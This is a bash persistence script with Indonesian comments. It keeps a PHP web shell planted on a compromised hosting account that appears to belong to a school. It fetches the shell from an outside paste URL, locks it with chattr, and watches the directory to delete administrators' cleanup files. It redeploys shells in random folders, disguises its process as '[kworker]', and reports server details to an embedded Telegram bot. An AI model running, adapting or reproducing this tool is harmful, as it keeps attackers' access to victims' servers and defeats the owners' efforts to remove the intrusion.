#!/bin/bash

# Logging
LOG_FILE="/tmp/anti_gedor.log"
exec > "$LOG_FILE" 2>&1
set -x

# Konfigurasi - PASTIKAN TIDAK ADA SLASH DI AKHIR
WEB_ROOT="/home/sekolahb/public_html"    # Tanpa slash di akhir
WEB_SHELL_DIR="$WEB_ROOT/shell"          # Akan menjadi /home/sekolahb/public_html/shell
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719"
TELEGRAM_BOT_TOKEN="7942393115:AAEriWlHhR0Y32kCHBZuYWj0ZcUvoW36MB0"
TELEGRAM_CHAT_ID="1345261884"

# Fungsi kirim notifikasi ke Telegram
send_telegram() {
    local message="$1"
    timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" > /dev/null 2>&1
}

# Fungsi notifikasi startup
send_startup_notification() {
    local server_ip=$(hostname -I | awk '{print $1}')
    local server_name=$(hostname)
    local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}')
    
    # Cek file shell yang ada
    local existing_shells=$(find "$WEB_SHELL_DIR" -name "*.php" 2>/dev/null | head -3)
    local shell_info=""
    if [ -n "$existing_shells" ]; then
        shell_info="Existing Shells:
$existing_shells"
    else
        shell_info="Status: Tidak ada shell yang ditemukan"
    fi
    
    send_telegram "🟢 ANTI GEDOR BOT AKTIF!
    
Server: $server_name ($server_ip)
Web Root: $WEB_ROOT
Shell Dir: $WEB_SHELL_DIR
Owner: $web_root_info
$shell_info

✅ Sistem siap menghadapi serangan!
Siapa berani hapus, langsung hilang duluan!🖕"
}

# Fungsi deploy ulang shell
deploy_shell() {
    # Dapatkan daftar direktori yang sudah ada di WEB_ROOT
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    
    # Pilih direktori acak dari daftar
    local random_dir="${existing_dirs[0]}"
    
    # Jika tidak ada direktori yang cocok, gunakan WEB_ROOT
    if [ -z "$random_dir" ]; then
        random_dir="$WEB_ROOT"
    fi
    
    # Generate nama file shell acak
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    
    # Download shell dari URL
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    chmod 400 "$new_shell_path"
    
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Fungsi deploy shell awal (saat startup)
deploy_initial_shell() {
    # Cek apakah sudah ada shell di direktori target
    local existing_shell=$(find "$WEB_SHELL_DIR" -name "*.php" | head -1)
    
    if [ -z "$existing_shell" ]; then
        echo "Tidak ada shell yang ditemukan, mendeploy shell awal..."
        # Deploy shell di direktori target
        local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
        local initial_shell_path="$WEB_SHELL_DIR/$shell_name"
        
        curl -s -o "$initial_shell_path" "$BACKUP_SHELL"
        chmod 400 "$initial_shell_path"
        
        if [ "$(id -u)" -eq 0 ]; then
            chattr +i "$initial_shell_path" 2>/dev/null
        fi
        
        send_telegram "🆕 INITIAL SHELL DEPLOYED: $initial_shell_path"
        echo "$initial_shell_path"
    else
        echo "Shell sudah ada: $existing_shell"
        send_telegram "✅ EXISTING SHELL FOUND: $existing_shell"
        echo "$existing_shell"
    fi
}

# Fungsi hapus file berbahaya
delete_intruder() {
    local target="$1"
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
}

# Fungsi deteksi PHP attacker
detect_and_delete_php_attacker() {
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}

# Main script
echo "Memulai script..."
echo "WEB_ROOT: $WEB_ROOT"
echo "WEB_SHELL_DIR: $WEB_SHELL_DIR"

# Bersihkan path (hapus double slash)
WEB_SHELL_DIR=$(echo "$WEB_SHELL_DIR" | sed 's|//|/|g')
echo "WEB_SHELL_DIR (cleaned): $WEB_SHELL_DIR"

# Buat direktori target
mkdir -p "$WEB_SHELL_DIR"
echo "Direktori target: $WEB_SHELL_DIR"

# Deploy shell awal
initial_shell=$(deploy_initial_shell)

# Kirim notifikasi startup
send_startup_notification

# Main loop dengan penyamaran proses
exec -a "[kworker]" bash -c '
# Definisikan ulang fungsi di dalam subshell
source /dev/stdin <<'EOF'
# Fungsi kirim notifikasi ke Telegram
send_telegram() {
    local message="$1"
    timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" > /dev/null 2>&1
}

# Fungsi deploy ulang shell
deploy_shell() {
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    local random_dir="${existing_dirs[0]}"
    if [ -z "$random_dir" ]; then
        random_dir="$WEB_ROOT"
    fi
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    chmod 400 "$new_shell_path"
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Fungsi hapus file berbahaya
delete_intruder() {
    local target="$1"
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
}

# Fungsi deteksi PHP attacker
detect_and_delete_php_attacker() {
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}
EOF

# Monitor direktori
inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event
do
    [[ -d "$file" ]] && continue
    
    # Hapus file yang diotak-atik
    delete_intruder "$file"
    
    # Deteksi dan hapus balik PHP attacker
    attacker_file=$(detect_and_delete_php_attacker)
    
    # Deploy shell baru
    new_shell=$(deploy_shell)
    
    # Kirim notifikasi lengkap
    if [ -n "$attacker_file" ]; then
        send_telegram "🚨 PHP ATTACKER DETECTED & DELETED!
File: $file
Event: $event
Attacker: $attacker_file
New Shell: $new_shell
✅Mendeteksi file PHP yang dipakai untuk menghapus.
✅Menghapus balik file PHP tersebut secara otomatis.
✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya.
Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
    else
        send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
    fi
done
' &